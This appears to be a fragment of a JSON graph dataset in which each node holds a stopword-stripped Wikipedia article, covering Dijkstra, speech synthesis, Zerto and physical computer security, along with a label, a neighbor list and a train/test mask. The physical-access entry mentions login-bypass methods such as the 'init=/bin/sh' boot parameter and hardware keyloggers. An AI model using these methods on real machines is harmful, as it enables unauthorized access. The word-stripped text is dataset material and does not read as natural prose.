working institute next computer minimize amount wire needed connect pins back panel machine solution re-discovered algorithm known prim minimal spanning tree algorithm prim algorithm originally developed 1930 czech mathematician vojtěch jarník later independently rediscovered republished robert c. prim 1957 dijkstra 1959 therefore also sometimes called djp algorithm 1961 dijkstra first described shunting-yard algorithm method parsing mathematical expressions specified infix notation mathematisch centrum report used produce output reverse polish notation rpn abstract syntax tree ast algorithm named shunting yard algorithm operation resembles railroad shunting yard shunting-yard algorithm commonly used implement operator-precedence parsers 1962 1963 dijkstra proposed semaphore mechanism mutual exclusion algorithm n processes generalization dekker algorithm probably first published concurrent algorithm introduced new area algorithmic research also identified deadlock problem proposed banker algorithm prevents deadlock 1974 dijkstra presented three self-stabilizing algorithms mutual exclusion ring dijkstra work considered first introduce demonstrate self-stabilization concept mid-1970s dijkstra together authors introduced two useful abstractions mutator collector study garbage collection mutator abstracts process performs computation including allocation new storage cell collector process automatically reclaims garbage furthermore paper gives formalization tri-color marking basic incremental garbage collection early 1980s dijkstra carel s. scholten proposed dijkstra–scholten algorithm detecting termination distributed systems 1981 dijkstra developed smoothsort comparison-based sorting algorithm variation heapsort dijkstra known fan algol 60 worked team implemented first compiler language closely involved algol 60 development realisation popularisation discussed peter naur article 'the european side last phase development algol 60 proceedings first acm sigplan conference history programming languages january 1978 dijkstra took part period 1958–1959 number meetings culminated publication report defining algol 60 language dijkstra name appear list 13 authors final report apparently eventually left committee could agree majority opinions still mathematisch centrum amsterdam wrote jointly jaap zonneveld first algol 60 compiler dijkstra zonneveld collaborated compiler agreed shave project completed zonneveld shaved shortly thereafter dijkstra kept beard rest life algol result collaboration american european committees algol 60 short algorithmic language 1960 member algol family computer programming languages followed algol 58 inspired many languages followed gave rise many programming languages including bcpl b pascal simula c. algol 60 sophisticatedly designed computer language provided large number hitherto unknown implementation challenges bjarne stroustrup notes one problem algol60 one knew implement major new challenge algol 60 implementation run-time allocation management data 1960 dijkstra zonneveld showed recursive procedures could executed using run-time stack activation records efficiently access identifiers statically enclosing scopes using so-called 'display algol 60 compiler one first support recursion employing novel method dijkstra short book primer algol 60 programming originally published 1962 standard reference language several years computer programming 1950s 1960s recognized academic discipline unlike mature sciences theoretical concepts coding systems programming professional activity poorly understood years late 1960s computer programming state crisis software crisis term used early days computing science difficulty writing useful efficient computer programs required time software crisis due rapid increases computer power complexity problems could tackled increase complexity software many software problems arose existing methods insufficient term software crisis coined attendees first nato software engineering conference 1968 garmisch germany 1972 acm turing award lecture makes reference problem major cause software crisis machines become several orders magnitude powerful put quite bluntly long machines programming problem weak computers programming became mild problem gigantic computers programming become equally gigantic problem dijkstra programmed extensively machine code 1950s came conclusion high-level languages frequent use goto statement usually symptomatic poor structure 1968 wrote private paper case go statement published letter cacm editor niklaus wirth gave letter heading go statement considered harmful introduced phrase considered harmful computing dijkstra argued programming statement goto found many high-level programming languages major source errors therefore eliminated letter caused huge debate programming community went length equating good programming elimination go dijkstra refused mention debate even go statement article notes structured programming debate long since died programming languages provide alternatives go programmers today use liberally never use dijkstra thesis departures linear control flow clearer allowed disciplined higher-level structures if-then-else statement loop methodology developed structured programming movement title 1972 book coauthored c.a.r hoare ole-johan dahl considered many first significant movement history computer programming structured programming became new programming orthodoxy 1970s bertrand meyer remarked revolution views programming started dijkstra iconoclasm led movement known structured programming advocated systematic rational approach program construction structured programming basis done since programming methodology including object-oriented programming structured programming often regarded goto-less programming bertrand meyer notes first book topic structured programming dijkstra dahl hoare shows structured programming much control structures goto principal message programming considered scientific discipline based mathematical rigor structured programming – especially 1970s 1980s – significantly influenced birth many modern programming languages pascal c modula-2 ada fortran 77 version incorporates concepts structured programming released 1978 c++ language considerably extended enhanced version popular c see also list c-based programming languages since c++ developed traditional 'hybrid language rather pure object-oriented programming language article structured programming retrospect prospect 1986 harlan mills writes edsger w. dijkstra 1969 structured programming article precipitated decade intense focus programming techniques fundamentally altered human expectations achievements software development decade intense focus programming regarded private puzzle-solving activity writing computer instructions work program decade programming could regarded public mathematics-based activity restructuring specifications programs challenge getting programs run getting debugged right things programs could expected run right things little debugging common wisdom sizable program could error-free many sizable programs run year errors detected expectations achievements universal inertia industrial practices well-enough established herald fundamental change software development book concise encyclopedia computer science 2004 edited edwin d. reilly notes major contributions structured programming twofold—the elevation programming technique something less art science demonstration carefully structured programs creative works sufficient literary merit deserve read humans computer dijkstra ideas programming methodology especially structured programming movement helped lay foundations birth development professional discipline software engineering particular software design development enabling programmers organize manage increasingly complex software projects late 1960s dijkstra discussed concept program families mid 1970s david parnas others clarified idea showed apply software engineering principles rise structured programming movement led many structured approaches applied software design techniques structured analysis structured design outgrowths structured programming concepts techniques early ideas modular design principles modularity strengthened larry constantine concepts coupling minimized modules cohesion maximized within modules david parnas techniques information hiding abstract data types number tools methods employing structured concepts developed structured design jackson structured programming ross structured analysis design technique sadt yourdon structured method structured systems analysis design method ssadm james martin information technology engineering field software metrics often considered direct influence structured programming movement software engineering 1970s separation concerns soc one basic principles software engineering design principle separating computer program distinct sections section addresses separate concern term separation concerns coined dijkstra 1974 paper role scientific thought 1960s dijkstra colleagues eindhoven designed implemented standing 'technische hogeschool eindhoven operating system organised clearly identified layers 1968 article subject provided foundation subsequent designs operating systems ieee computer society david alan grier writes generally trace idea building computer systems layers back 1967 paper dutch computer scientist edsger dijkstra gave joint ieee computer society/acm conference prior paper engineers struggled problem organize software look early examples programs find many electronic library computer society find code era complicated difficult read hard modify challenging reuse 1967 paper dijkstra described software could constructed layers gave example simple operating system used five layers admitted system might realistic test ideas argued larger project essential structuring idea using layers control complexity become mainstay software architecture see many forms apply many problems see hierarchy classes object-oriented programming structure service-oriented architecture soa soa relatively recent application layering computer science articulated 2007 means controlling complexity business systems especially distributed systems make substantial use internet like dijkstra plan system development layering system called soa solution stack s3 s3 nine layers 1 operational systems 2 service components 3 services 4 business processes 5 consumer actions 6 system integration 7 quality control assurance 8 information architecture 9 system governance policies dijkstra organized design system layers order reduce overall complexity software though term 'architecture yet used describe software design certainly considered first glimpse software architecture introduced number design principles become part working vocabulary every professional programmer levels abstraction programming layers semaphore cooperating sequential processes original paper operating system reprinted 25th anniversary issue communications acm january 1983 way introduction editor-in-chief says project initiated long line research multilevel systems architecture — line continues present day hierarchical modularity powerful approach organizing large systems one-page paper 1965 dijkstra introduced 'mutual exclusion problem n processes discussed solution probably first published concurrent algorithm notion standard 'critical section also introduced paper per brinch hansen pioneer field concurrent computing considers dijkstra cooperating sequential processes 1965 first classic paper concurrent programming brinch hansen notes 'dijkstra lays conceptual foundation abstract concurrent programming paper 1968 dijkstra published seminal paper 'cooperating sequential processes 70-page essay originated field concurrent programming discussed notion mutual exclusion mutex criteria satisfactory solution satisfy also redressed historical perspective left 1965 paper including first known correct solution mutual exclusion problem two processes due theodorus dekker dijkstra subsequently generalized dekker solution n processes proposed first synchronisation mechanism concurrent processes semaphore two operations p v. also identified 'deadlock problem called 'the problem deadly embrace proposed elegant 'banker algorithm prevents deadlock deadlock detection prevention became perennial research problems field concurrent programming dining philosophers problem example problem often used concurrent algorithm design illustrate synchronization issues techniques resolving originally formulated 1965 dijkstra student exam exercise presented terms computers competing access tape drive peripherals soon tony hoare gave problem present formulation sleeping barber problem also attributed dijkstra book concurrent programming algorithms principles foundations michel raynal writes since early work e.w dijkstra 1965 introduced mutual exclusion problem concept process semaphore object notion weakest precondition guarded commands among many contributions synchronization longer catalog tricks domain computing science concepts mechanisms techniques whose results applied many domains means process synchronization major topic computer science curriculum john w. mccormick et al 2011 notes notion concurrent program means writing parallel programs without regard underlying hardware first introduced edsger dijkstra 1968 moti ben-ari 1982 elegantly summed dijkstra idea three sentences ‘ concurrent programming name given programming notation techniques expressing potential parallelism solving resulting synchronization communication problems implementation parallelism topic computer systems hardware software essentially independent concurrent programming concurrent programming important provides abstract setting study parallelism without getting bogged implementation details. ’ dijkstra one early pioneers research principles distributed computing citation dijkstra prize recognizes individual larger influence research principles distributed computing papers even considered established field dijkstra 1965 paper solution problem concurrent programming control first present correct solution mutual exclusion problem leslie lamport writes work probably podc exists started field concurrent distributed algorithms particular paper self-stabilizing systems spite distributed control 1974 started sub-field self-stabilization also considered first scientific examination fault-tolerant systems dijkstra paper widely noticed leslie lamport invited talk acm symposium principles distributed computing podc 1983 report dijkstra work self-stabilizing distributed systems lamport regard milestone work fault tolerance fertile field research 1970s dijkstra chief interest formal verification 1976 dijkstra published seminal book discipline programming put forward method systematic development programs together correctness proofs exposition used 'guarded command language language reliance non-determinism adopted weakest precondition semantics proposed development method considerable impact field day refinement calculus originally proposed ralph-johan back developed carroll morgan extension dijkstra weakest precondition calculus program statements modeled predicate transformers 1984 add support approach programming published jointly wim feijen introductory textbook first-year students computer science book first published dutch entitled een methode van programmeren english edition appeared 1988 method programming many opinions computer science programming become widespread example programming phrase two use rule thumb use loop sometimes attributed first make claim programming inherently complex order manage successfully programmers need harness every trick abstraction possible dijkstra one famous opponents engineering view computing science like peter naur kristen nygaard dijkstra disliked term 'computer science computer science dijkstra pointed deserves better name suggests called 'computing science instead computer computing technology dijkstra wanted emphasize abstract mechanisms computing science uses master complexity expressing abstract nature computing science wrote humble programmer 1972 dijkstra wrote must forget computing scientists business make programs business design classes computations display desired behaviour dijkstra also opposed inclusion software engineering umbrella academic computer science wrote economics known miserable science software engineering known doomed discipline doomed even approach goal since goal self-contradictory software engineering accepted charter program world computing science dijkstra well known character preface book discipline programming 1976 stated following absence bibliography offer neither explanation apology fact articles books references approach references deplored researchers dijkstra chose way working preserve self-reliance university professor much life dijkstra saw teaching required activity serious research endeavor approach teaching unconventional lecturing style described idiosyncratic lecturing long pauses sentences often attributed fact english dijkstra first language however pauses also served way think feet regarded quick deep thinker engaged act lecturing courses students austin little computer science dealt presentation mathematical proofs beginning semester would take photo students order memorize names never followed textbook possible exception preparation lecturing would write proofs chalk blackboard rather using overhead foils invited students suggest ideas explored refused explore violated tenets assigned challenging homework problems would study students solutions thoroughly conducted final examinations orally whole week student examined dijkstra office home exam lasted several hours also highly original way assessing people capacity job vladimir lifschitz came austin 1990 job interview dijkstra gave puzzle vladimir solved working austin since despite invented much technology software dijkstra eschewed use computers work many decades even succumbed ut colleagues encouragement acquired macintosh computer used e-mail browsing world wide web dijkstra never wrote articles using computer preferred rely typewriter later montblanc pen dijkstra favorite writing instrument montblanc meisterstück fountain pen repeatedly tried pens none ever displaced montblanc use word processors believing one able write letter article without rough drafts rewriting significant editing would work head putting pen paper mentioned physics student would solve homework problems head walking streets leiden dijkstra publications written alone never secretary took care correspondence alone colleagues prepared festschrift sixtieth birthday published springer-verlag took trouble thank 61 contributors separately hand-written letter throughout dijkstra career work characterized elegance economy prolific writer especially essayist dijkstra authored 1,300 papers many written hand precise script essays parables fairy tales warnings comprehensive explanation pedagogical pretext mathematics computer science others trip reports revealing author people places visited habit copy paper circulate small group colleagues would copy forward papers another limited group scientists love affair simplicity came early age mother guidance said asked mother whether trigonometry difficult topic replied must learn formulas furthermore required five lines prove something wrong track dijkstra famous wit eloquence rudeness abruptness often cruelty fellow professionals way words remark question whether machines think … relevant question whether submarines swim advice promising researcher asked select topic research dijkstra also known vocal criticism absence social skills interacting colleagues outspoken critical visionary strongly opposed teaching basic many humorous essays dijkstra described fictional company served chairman company called mathematics inc. company imagined commercialized production mathematical theorems way software companies commercialized production computer programs invented number activities challenges mathematics inc. documented several papers ewd series imaginary company produced proof riemann hypothesis great difficulties collecting royalties mathematicians proved results assuming riemann hypothesis proof trade secret many company proofs rushed door much company effort spent maintenance successful effort standard proof pythagoras theorem replaced 100 incompatible existing proofs dijkstra described mathematics inc. exciting miserable business ever conceived ewd 443 1974 describes fictional company 75 percent world market share dijkstra well known habit carefully composing manuscripts fountain pen manuscripts called ewds since dijkstra numbered ewd initials prefix according dijkstra ewds started moved mathematical centre amsterdam eindhoven university technology technische hogeschool eindhoven going eindhoven dijkstra experienced writer block year dijkstra distributed photocopies new ewd among colleagues many recipients photocopied forwarded copies ewds spread throughout international computer science community topics computer science mathematics included trip reports letters speeches short articles span period 40 years almost ewds appearing 1972 hand-written rarely longer 15 pages consecutively numbered last one 1318 14 april 2002 within computer science known ewd reports simply ewds 1300 ewds scanned growing number transcribed facilitate search available online dijkstra archive university texas dijkstra self-confidence went together remarkably modest lifestyle point spartan wife house nuenen simple small unassuming tv vcr mobile telephone go movies contrast played piano well austin liked go concerts enthusiastic listener classical music dijkstra favorite composer mozart dijkstra died 6 august 2002 according officials university texas cause death cancer 1972 association computing machinery acm acknowledged dijkstra seminal contributions field awarding distinguished turing award citation award reads introduction given awards ceremony tribute dijkstra words sir tony hoare frs delivered dijkstra funeral march 2003 following email sent distributed computing community former acm president peter j. denning wrote dijkstra among dijkstra awards honors distinguished fellowship british computer society bcs awarded bylaw 7 bcs royal charter award first approved 1969 first election made 1971 dijkstra occasion dijkstra 60th birthday 1990 department computer science utcs university texas austin organized two-day seminar honor speakers came united states europe group computer scientists contributed research articles edited book 2002 c c foundation japan recognized dijkstra pioneering contributions establishment scientific basis computer software creative research basic software theory algorithm theory structured programming semaphores dijkstra alive receive notice award accepted family award ceremony death shortly death 2002 dijkstra received acm podc influential-paper award distributed computing work self-stabilization program computation annual award renamed dijkstra prize edsger w. dijkstra prize distributed computing following year honor dijkstra award outstanding academic achievement computer science loyola university chicago department computer science named edsger w. dijkstra beginning 2005 award recognizes top academic performance graduating computer science major selection based gpa major courses election department faculty department computer science utcs university texas austin hosted inaugural edsger w. dijkstra memorial lecture 12 october 2010 tony hoare emeritus professor oxford principal researcher microsoft research speaker event lecture series made possible generous grant schlumberger honor memory dijkstra",
    "neighbors": [
      512,
      11265,
      9224,
      4107,
      1051,
      6184,
      5677,
      5684,
      1591,
      2619,
      5699,
      70,
      8262,
      1610,
      1611,
      9804,
      11339,
      9294,
      7775,
      9315,
      7780,
      4201,
      119,
      2680,
      3196,
      5245,
      9345,
      9351,
      5774,
      655,
      1180,
      10909,
      2206,
      1702,
      3751,
      7851,
      4799,
      4800,
      11457,
      9926,
      9932,
      11474,
      1236,
      731,
      11487,
      10471,
      2283,
      2798,
      5363,
      2804,
      2294,
      1783,
      5373,
      2304,
      6403,
      1801,
      11020,
      4877,
      7446,
      5404,
      6950,
      7983,
      6454,
      10042,
      4412,
      10049,
      4930,
      1349,
      10568,
      8524,
      10061,
      2901,
      1883,
      6502,
      11625,
      10617,
      5503,
      4483,
      7048,
      1947,
      6558,
      1952,
      10658,
      939,
      428,
      10668,
      5039,
      5040,
      2482,
      1976,
      8122,
      3529,
      9677,
      5585,
      9688,
      5081,
      2012,
      11242,
      9710,
      9714,
      6652,
      2045,
      2558,
      511
    ],
    "mask": "None"
  },
  {
    "node_id": 3530,
    "label": 3,
    "text": "Thermal_Head:thermal head thermal head component metrological device created aid development new cpus chipsets first thermal head constructed 1996 james kerner initially designed control slot 1 intel processor temperature making computations test platform thermal head attached cpu may also increase cpu performance computation today used test/validation processor conjunction thermal management system consisting temperature controller attached thermal head way electrical umbilical thermal head always used conjunction thermal tool system among ustc thermal tool system products integrated thermal management system itms hybrid air thermal management system hatms rack integrated thermal management system ritms temperature control system tcs thermal heads th integrating cooling modules tcs one enclosure liquid working fluid combined th itms executes temperature control tasks without components using air cooling media hatms executes tasks like itms ritms includes smart tcs unit automatically adjusts parameters temperature control ultra-low noise level low power consumption tcs standard temperature control unit th dissipate heat heat-generated device like computer ritms tcs combined chiller heat exchanger th provide standard way control temperature dissipate heat electronic components production validation tests",
    "neighbors": [
      2525,
      3798
    ],
    "mask": "Train"
  },
  {
    "node_id": 3531,
    "label": 4,
    "text": "Zerto:zerto zerto ltd. main product zerto virtual replication provides business continuity software virtualized infrastructure cloud environments zerto headquartered israel ziv kedem zerto founder ceo previously co-founded kashya zerto received investments venture capital firms 83north formerly greylock il battery ventures harmony partners rtp ventures ivp usvp 2016 company ranked 45 deloitte fast 500 north america list 10 august 2017 emc corporation awarded ongoing royalties payable zerto connection 4 patents zerto provides disaster recovery software virtualized cloud infrastructures company main product zerto virtual replication released august 2011 technology leverages 'hypervisor-based replication moves data replication server stack storage layer hypervisor zerto entirely hypervisor storage-agnostic data replicated vm operating different platform zvr initially support microsoft azure",
    "neighbors": [
      7983,
      1935
    ],
    "mask": "None"
  },
  {
    "node_id": 3532,
    "label": 4,
    "text": "Physical_access:physical access physical access term computer security refers ability people physically gain access computer system according gregory white given physical access office knowledgeable attacker quickly able find information needed gain access organization computer systems network physical access opens variety avenues hacking michael meyers notes best network software security measures rendered useless fail physically protect systems since intruder could simply walk server crack password leisure physical access also allows hardware keyloggers installed intruder may able boot cd external media read unencrypted data hard drive may also exploit lack access control boot loader instance pressing f8 certain versions microsoft windows booting specifying 'init=/bin/sh boot parameter linux usually done editing command line grub etc one could also use rogue device access poorly secured wireless network signal sufficiently strong one might even need breach perimeter security standards united states typically call physical access limited locked server rooms sign-in sheets etc physical access systems security systems historically administered separate departments organizations increasingly seen interdependent functions needing single converged security policy department could instance check security log entries suspicious logons occurring business hours use keycard swipe records building access control system narrow list suspects building time surveillance cameras might also used deter detect unauthorized access",
    "neighbors": [
      647,
      2312,
      8333,
      688,
      2737,
      2801,
      9233,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3533,
    "label": 0,
    "text": "Speech_synthesis:speech synthesis speech synthesis artificial production human speech computer system used purpose called speech computer speech synthesizer implemented software hardware products text-to-speech tts system converts normal language text speech systems render symbolic linguistic representations like phonetic transcriptions speech synthesized speech created concatenating pieces recorded speech stored database systems differ size stored speech units system stores phones diphones provides largest output range may lack clarity specific usage domains storage entire words sentences allows high-quality output alternatively synthesizer incorporate model vocal tract human voice characteristics create completely synthetic voice output quality speech synthesizer judged similarity human voice ability understood clearly intelligible text-to-speech program allows people visual impairments reading disabilities listen written words home computer many computer operating systems included speech synthesizers since early 1990s text-to-speech system engine composed two parts front-end back-end front-end two major tasks first converts raw text containing symbols like numbers abbreviations equivalent written-out words process often called text normalization pre-processing tokenization front-end assigns phonetic transcriptions word divides marks text prosodic units like phrases clauses sentences process assigning phonetic transcriptions words called text-to-phoneme grapheme-to-phoneme conversion phonetic transcriptions prosody information together make symbolic linguistic representation output front-end back-end—often referred synthesizer —then converts symbolic linguistic representation sound certain systems part includes computation target prosody pitch contour phoneme durations imposed output speech long invention electronic signal processing people tried build machines emulate human speech early legends existence brazen heads involved pope silvester ii d. 1003 ad albertus magnus 1198–1280 roger bacon 1214–1294 1779 german-danish scientist christian gottlieb kratzenstein first prize competition announced russian imperial academy sciences arts models built human vocal tract could produce five long vowel sounds notation followed bellows-operated acoustic-mechanical speech machine wolfgang von kempelen pressburg hungary described 1791 paper machine added models tongue lips enabling produce consonants well vowels 1837 charles wheatstone produced speaking machine based von kempelen design 1846 joseph faber exhibited euphonia 1923 paget resurrected wheatstone design 1930s bell labs developed vocoder automatically analyzed speech fundamental tones resonances work vocoder homer dudley developed keyboard-operated voice-synthesizer called voder voice demonstrator exhibited 1939 new york world fair dr. franklin s. cooper colleagues haskins laboratories built pattern playback late 1940s completed 1950 several different versions hardware device one currently survives machine converts pictures acoustic patterns speech form spectrogram back sound using device alvin liberman colleagues discovered acoustic cues perception phonetic segments consonants vowels first computer-based speech-synthesis systems originated late 1950s noriko umeda et al developed first general english text-to-speech system 1968 electrotechnical laboratory japan 1961 physicist john larry kelly jr colleague louis gerstman used ibm 704 computer synthesize speech event among prominent history bell labs kelly voice recorder synthesizer vocoder recreated song daisy bell musical accompaniment max mathews coincidentally arthur c. clarke visiting friend colleague john pierce bell labs murray hill facility clarke impressed demonstration used climactic scene screenplay novel hal 9000 computer sings song astronaut dave bowman puts sleep despite success purely electronic speech synthesis research mechanical speech-synthesizers continues linear predictive coding lpc form speech coding began development work fumitada itakura nagoya university shuzo saito nippon telegraph telephone ntt 1966 developments lpc technology made bishnu s. atal manfred r. schroeder bell labs 1970s lpc later basis early speech synthesizer chips texas instruments lpc speech chips used speak spell toys 1978 1975 fumitada itakura developed line spectral pairs lsp method high-compression speech coding ntt 1975 1981 itakura studied problems speech analysis synthesis based lsp method 1980 team developed lsp-based speech synthesizer chip lsp important technology speech synthesis coding 1990s adopted almost international speech coding standards essential component contributing enhancement digital speech communication mobile channels internet 1975 musa released one first speech synthesis systems consisted stand-alone computer hardware specialized software enabled read italian second version released 1978 also able sing italian cappella style dominant systems 1980s 1990s dectalk system based largely work dennis klatt mit bell labs system latter one first multilingual language-independent systems making extensive use natural language processing methods handheld electronics featuring speech synthesis began emerging 1970s one first telesensory systems inc. tsi speech+ portable calculator blind 1976 devices primarily educational purposes speak spell toy produced texas instruments 1978 fidelity released speaking version electronic chess computer 1979 first video game feature speech synthesis 1980 shoot 'em arcade game stratovox known japan speak rescue sun electronics first personal computer game speech synthesis manbiki shoujo shoplifting girl released 1980 pet 2001 game developer hiroshi suzuki developed zero cross programming technique produce synthesized speech waveform another early example arcade version berzerk also dates 1980 milton bradley company produced first multi-player electronic game using voice synthesis milton year early electronic speech-synthesizers sounded robotic often barely intelligible quality synthesized speech steadily improved output contemporary speech synthesis systems remains clearly distinguishable actual human speech kurzweil predicted 2005 cost-performance ratio caused speech synthesizers become cheaper accessible people would benefit use text-to-speech programs important qualities speech synthesis system naturalness intelligibility naturalness describes closely output sounds like human speech intelligibility ease output understood ideal speech synthesizer natural intelligible speech synthesis systems usually try maximize characteristics two primary technologies generating synthetic speech waveforms concatenative synthesis formant synthesis technology strengths weaknesses intended uses synthesis system typically determine approach used concatenative synthesis based concatenation stringing together segments recorded speech generally concatenative synthesis produces natural-sounding synthesized speech however differences natural variations speech nature automated techniques segmenting waveforms sometimes result audible glitches output three main sub-types concatenative synthesis unit selection synthesis uses large databases recorded speech database creation recorded utterance segmented following individual phones diphones half-phones syllables morphemes words phrases sentences typically division segments done using specially modified speech recognizer set forced alignment mode manual correction afterward using visual representations waveform spectrogram index units speech database created based segmentation acoustic parameters like fundamental frequency pitch duration position syllable neighboring phones run time desired target utterance created determining best chain candidate units database unit selection process typically achieved using specially weighted decision tree unit selection provides greatest naturalness applies small amount digital signal processing dsp recorded speech dsp often makes recorded speech sound less natural although systems use small amount signal processing point concatenation smooth waveform output best unit-selection systems often indistinguishable real human voices especially contexts tts system tuned however maximum naturalness typically require unit-selection speech databases large systems ranging gigabytes recorded data representing dozens hours speech also unit selection algorithms known select segments place results less ideal synthesis e.g minor words become unclear even better choice exists database recently researchers proposed various automated methods detect unnatural segments unit-selection speech synthesis systems diphone synthesis uses minimal speech database containing diphones sound-to-sound transitions occurring language number diphones depends phonotactics language example spanish 800 diphones german 2500 diphone synthesis one example diphone contained speech database runtime target prosody sentence superimposed minimal units means digital signal processing techniques linear predictive coding psola mbrola recent techniques pitch modification source domain using discrete cosine transform diphone synthesis suffers sonic glitches concatenative synthesis robotic-sounding nature formant synthesis advantages either approach small size use commercial applications declining although continues used research number freely available software implementations early example diphone synthesis teaching robot leachim invented michael j. freeman leachim contained information regarding class curricular certain biographical information 40 students programmed teach tested fourth grade classroom bronx new york domain-specific synthesis concatenates prerecorded words phrases create complete utterances used applications variety texts system output limited particular domain like transit schedule announcements weather reports technology simple implement commercial use long time devices like talking clocks calculators level naturalness systems high variety sentence types limited closely match prosody intonation original recordings systems limited words phrases databases general-purpose synthesize combinations words phrases preprogrammed blending words within naturally spoken language however still cause problems unless many variations taken account example non-rhotic dialects english r words like clear usually pronounced following word vowel first letter e.g clear realized likewise french many final consonants become longer silent followed word begins vowel effect called liaison alternation reproduced simple word-concatenation system would require additional complexity context-sensitive formant synthesis use human speech samples runtime instead synthesized speech output created using additive synthesis acoustic model physical modelling synthesis parameters fundamental frequency voicing noise levels varied time create waveform artificial speech method sometimes called rules-based synthesis however many concatenative systems also rules-based components many systems based formant synthesis technology generate artificial robotic-sounding speech would never mistaken human speech however maximum naturalness always goal speech synthesis system formant synthesis systems advantages concatenative systems formant-synthesized speech reliably intelligible even high speeds avoiding acoustic glitches commonly plague concatenative systems high-speed synthesized speech used visually impaired quickly navigate computers using screen reader formant synthesizers usually smaller programs concatenative systems database speech samples therefore used embedded systems memory microprocessor power especially limited formant-based systems complete control aspects output speech wide variety prosodies intonations output conveying questions statements variety emotions tones voice examples non-real-time highly accurate intonation control formant synthesis include work done late 1970s texas instruments toy speak spell early 1980s sega arcade machines many atari inc. arcade games using tms5220 lpc chips creating proper intonation projects painstaking results yet matched real-time text-to-speech interfaces formant synthesis implemented hardware yamaha fs1r synthesizer speech aspect formants never realized synthesis capable short several-second formant sequences could speak single phrase since midi control interface restrictive live speech impossibility articulatory synthesis refers computational techniques synthesizing speech based models human vocal tract articulation processes occurring first articulatory synthesizer regularly used laboratory experiments developed haskins laboratories mid-1970s philip rubin tom baer paul mermelstein synthesizer known asy based vocal tract models developed bell laboratories 1960s 1970s paul mermelstein cecil coker colleagues recently articulatory synthesis models incorporated commercial speech synthesis systems notable exception next-based system originally developed marketed trillium sound research spin-off company university calgary much original research conducted following demise various incarnations next started steve jobs late 1980s merged apple computer 1997 trillium software published gnu general public license work continuing gnuspeech system first marketed 1994 provides full articulatory-based text-to-speech conversion using waveguide transmission-line analog human oral nasal tracts controlled carré distinctive region model recent synthesizers developed jorge c. lucero colleagues incorporate models vocal fold biomechanics glottal aerodynamics acoustic wave propagation bronqui traquea nasal oral cavities thus constitute full systems physics-based speech simulation hmm-based synthesis synthesis method based hidden markov models also called statistical parametric synthesis system frequency spectrum vocal tract fundamental frequency voice source duration prosody speech modeled simultaneously hmms speech waveforms generated hmms based maximum likelihood criterion sinewave synthesis technique synthesizing speech replacing formants main bands energy pure tone whistles deep learning-based synthesizers use deep neural networks dnn trained recorded speech data dnn-based speech synthesizers approaching quality human voice examples wavenet deepmind tacotron google deep voice uses wavenet technology baidu process normalizing text rarely straightforward texts full heteronyms numbers abbreviations require expansion phonetic representation many spellings english pronounced differently based context example latest project learn better project voice contains two pronunciations project text-to-speech tts systems generate semantic representations input texts processes unreliable poorly understood computationally ineffective result various heuristic techniques used guess proper way disambiguate homographs like examining neighboring words using statistics frequency occurrence recently tts systems begun use hmms discussed generate parts speech aid disambiguating homographs technique quite successful many cases whether read pronounced red implying past tense reed implying present tense typical error rates using hmms fashion usually five percent techniques also work well european languages although access required training corpora frequently difficult languages deciding convert numbers another problem tts systems address simple programming challenge convert number words least english like 1325 becoming one thousand three hundred twenty-five however numbers occur many different contexts 1325 may also read one three two five thirteen twenty-five thirteen hundred twenty five tts system often infer expand number based surrounding words numbers punctuation sometimes system provides way specify context ambiguous roman numerals also read differently depending context example henry viii reads henry eighth chapter viii reads chapter eight similarly abbreviations ambiguous example abbreviation inches must differentiated word address 12 st john st. uses abbreviation saint street tts systems intelligent front ends make educated guesses ambiguous abbreviations others provide result cases resulting nonsensical sometimes comical outputs ulysses s. grant rendered ulysses south grant speech synthesis systems use two basic approaches determine pronunciation word based spelling process often called text-to-phoneme grapheme-to-phoneme conversion phoneme term used linguists describe distinctive sounds language simplest approach text-to-phoneme conversion dictionary-based approach large dictionary containing words language correct pronunciations stored program determining correct pronunciation word matter looking word dictionary replacing spelling pronunciation specified dictionary approach rule-based pronunciation rules applied words determine pronunciations based spellings similar sounding synthetic phonics approach learning reading approach advantages drawbacks dictionary-based approach quick accurate completely fails given word dictionary dictionary size grows memory space requirements synthesis system hand rule-based approach works input complexity rules grows substantially system takes account irregular spellings pronunciations consider word common english yet word letter f pronounced result nearly speech synthesis systems use combination approaches languages phonemic orthography regular writing system prediction pronunciation words based spellings quite successful speech synthesis systems languages often use rule-based method extensively resorting dictionaries words like foreign names borrowings whose pronunciations obvious spellings hand speech synthesis systems languages like english extremely irregular spelling systems likely rely dictionaries use rule-based methods unusual words words n't dictionaries consistent evaluation speech synthesis systems may difficult lack universally agreed objective evaluation criteria different organizations often use different speech data quality speech synthesis systems also depends quality production technique may involve analogue digital recording facilities used replay speech evaluating speech synthesis systems therefore often compromised differences production techniques replay facilities since 2005 however researchers started evaluate speech synthesis systems using common speech dataset study journal speech communication amy drahota colleagues university portsmouth uk reported listeners voice recordings could determine better chance levels whether speaker smiling suggested identification vocal features signal emotional content may used help make synthesized speech sound natural one related issues modification pitch contour sentence depending upon whether affirmative interrogative exclamatory sentence one techniques pitch modification uses discrete cosine transform source domain linear prediction residual pitch synchronous pitch modification techniques need priori pitch marking synthesis speech database using techniques epoch extraction using dynamic plosion index applied integrated linear prediction residual voiced regions speech popular systems offering speech synthesis built-in capability mattel intellivision game console offered intellivoice voice synthesis module 1982 included sp0256 narrator speech synthesizer chip removable cartridge narrator 2kb read-only memory rom utilized store database generic words could combined make phrases intellivision games since orator chip could also accept speech data external memory additional words phrases needed could stored inside cartridge data consisted strings analog-filter coefficients modify behavior chip synthetic vocal-tract model rather simple digitized samples also released 1982 software automatic mouth first commercial all-software voice synthesis program later used basis macintalk program available non-macintosh apple computers including apple ii lisa various atari models commodore 64 apple version preferred additional hardware contained dacs although could instead use computer one-bit audio output addition much distortion card present atari made use embedded pokey audio chip speech playback atari normally disabled interrupt requests shut antic chip vocal output audible output extremely distorted speech screen commodore 64 made use 64 embedded sid audio chip arguably first speech system integrated operating system 1400xl/1450xl personal computers designed atari inc. using votrax sc01 chip 1983 1400xl/1450xl computers used finite state machine enable world english spelling text-to-speech synthesis unfortunately 1400xl/1450xl personal computers never shipped quantity atari st computers sold stspeech.tos floppy disk first speech system integrated operating system shipped quantity apple computer macintalk software licensed 3rd party developers joseph katz mark barton later softvoice inc. featured 1984 introduction macintosh computer january demo required 512 kilobytes ram memory result could run 128 kilobytes ram first mac actually shipped demo accomplished prototype 512k mac although attendance told synthesis demo created considerable excitement macintosh early 1990s apple expanded capabilities offering system wide text-to-speech support introduction faster powerpc-based computers included higher quality voice sampling apple also introduced speech recognition systems provided fluid command set recently apple added sample-based voices starting curiosity speech system apple macintosh 